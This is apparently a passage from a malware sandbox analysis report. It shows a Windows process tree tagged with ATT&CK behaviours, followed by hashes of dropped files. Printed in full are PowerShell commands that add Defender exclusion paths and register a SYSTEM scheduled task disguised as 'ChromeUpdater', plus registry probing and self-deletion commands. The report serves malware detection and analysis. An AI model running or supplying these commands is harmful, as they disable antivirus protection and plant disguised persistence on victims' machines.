C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵PID:4708
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:5056
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:5036
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵PID:2756
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4256 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:2892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:4488
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵PID:4496
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:1456
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵PID:1416
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵PID:1864
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:4868
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2" 2>nul5⤵PID:1108
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2"6⤵PID:5112
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:3980 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵PID:4464
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵PID:2852
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:2020 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Driver REG_SZ vhdmp\Target Id 0\Logical Unit Id 0"6⤵PID:3224
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
PID:4832 -
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵PID:464
-
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\iIejXplCjaCpPshklkztydsmNmHZJd.exe"C:\Users\Admin\AppData\Local\Microsoft\iIejXplCjaCpPshklkztydsmNmHZJd.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:1892
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵PID:2296
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\HQwlrLZylofyEqTIOcaDLwMgBreuXj.exe"2⤵PID:3820
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4832
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1164
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:5108
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1060
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
PID:4616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
PID:2700
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵PID:4444
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Microsoft\iIejXplCjaCpPshklkztydsmNmHZJd.exe"2⤵PID:4412
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2088
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=4204,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=3872 /prefetch:81⤵PID:3764
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations=is-enterprise-managed=no --field-trial-handle=1308,i,4538255413480930743,12957764444767653848,262144 --variations-seed-version --mojo-platform-channel-handle=3912 /prefetch:81⤵PID:1456
-
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:3588
-
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"1⤵
- Executes dropped EXE
PID:1044
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133KB
MD5b789be46d520694943db87140ba6edb6
SHA13cc6c4ac64112a771ccd3235e313dcfcdc7a78d9
SHA256a6195edcc520035e9baf76f120fa62909ccea148a3a4596d81cda06e08fef962
SHA512648d70c844d4425c5a83882836ea65067e54eed181d355e950a267da5ad92343ef08a4cb4eccfe45aa8561be94ac686807c867d0e0cb438ddf5988e502923d34
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
9.8MB
MD5f0d66591cc208003b04be406c2ea8420
SHA106458ca23059df3117666cb4a64dc2e26f9daf97
SHA256927f00ec370ff3aa74cb58bcd118e6198f1945fe7691f8f73f3feaa046dcfb5d
SHA512cf67d6eaac9bc848297df4b4f67ff6ef606161b1e9198af6a7f5430a240ca261503c23bb2c15b386a1b421181a399531a3735739a2b860beb18f5e8ea5c01c6a
-
Filesize
595KB
MD569b8138d0e9dd6b169043520330bceac
SHA1aabe9458e1751623e727fb775e923103a02afe7a
SHA25601825f4cb340163af8d9f803a31dc20c1e33404ced73e17dbf74896d7ec1c34b
SHA512fa135dfec349bc9a3fd8348b2a60352a01ef27d73505550291953b2274994aff88a614fd225b97c2824fa05e91580ac7dd2292065a99514d17f731c0711574d0
-
Filesize
1KB
MD5af1cc13f412ef37a00e668df293b1584
SHA18973b3e622f187fcf484a0eb9fa692bf3e2103cb
SHA256449c0c61734cf23f28ad05a7e528f55dd8a7c6ae7a723253707e5f73de187037
SHA51275d954ec8b98f804d068635875fac06e9594874f0f5d6e2ad9d6267285d1d4a1de6309009de9e2956c6477a888db648396f77a1a49b58287d2683b8214e7a3d3
-
Filesize
1KB
MD5b15f65d7cf4e7456abee410cd3d5497c
SHA1039679244c8dce47a650b007616b0549423f8da4
SHA256805e128a3c3200f8ceb354ba202900094ede4ba725a6554174636a74af00c6e4
SHA512d86d6c5d662182666ae09cf5b451fc440c53263f6925625b4781ef69b0456333749314484447cef5766863d2d7119ae03f7f54830870647824a5645f13c76ba4
-
Filesize
1KB
MD5c67441dfa09f61bca500bb43407c56b8
SHA15a56cf7cbeb48c109e2128c31b681fac3959157b
SHA25663082da456c124d0bc516d2161d1613db5f3008d903e4066d2c7b4e90b435f33
SHA512325de8b718b3a01df05e20e028c5882240e5fd2e96c771361b776312923ff178f27494a1f5249bf6d7365a99155eb8735a51366e85597008e6a10462e63ee0e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5060a9d492eb13b842aad02350b1e7284
SHA138be5b02a8db6bcc884ab9968cc6e968933cef0c
SHA256ef7848cafcc9287ec535cc0f98cd26257f03f4dea69e5f175cba8d7629b2075a
SHA512eade10f9e1099b16f7d2361c4a7d7ed23ca211a6b24fb786f9d348416ad5f998e6079ba82966f7e518fe22f80f4443c0026df6bc0812a349ddddc29b97618748
-
Filesize
201KB
MD5d4f11c9a6a07f2a9ec69bc367b9243be
SHA163a5efac9bee6e1fd7de45fe10b5768c8fd9e382
SHA2560dcf580f5f74465642419ae9f8c56ea2cb4116d8d2c37f4ee4e3dcd45c50f1f0
SHA51214d061b2b6b486f0294c2228dd5badfbcd3296be59777449239201bcf3095b0c89eafe9e88683b1c924022ee795aee8e5b6483046a08d824f74d1061aa7846e0
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize3KB
MD56db666b8eea8c87bb44fc342dbda5fcb
SHA12536fb957e13fd2144e482970707286ca2625816
SHA256079b31aa6c5078c9a97ffc9cfd2778942fbb12359b05975eb18507b6a1f18438
SHA51288fcd3e8aaefc443b3fac3ec5a55762424a9d2211b051a36daad0c6be63f7a3f6f51d4be4e89189be044c7df6bcbded7eab6d3cba07a7a1458c48604b365579e
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5a4fe0be11fb007b21a2fafa6abe0bf6f
SHA1d0f2c0a5c7ee3491272101c3aaf7998bbb2fd22a
SHA256ec0577e1bf334d310a1a70fd57fd1e561a90bbdd34737daed674f01c36c0c8d2
SHA5121c51108e19f5a97acb7bba7c996c26a2715e3a4bb04b79c9afd718f8b8822bf906123e42eb1e40c88206bbce86b43546644d88794cc0de26126a38d9e27e01c0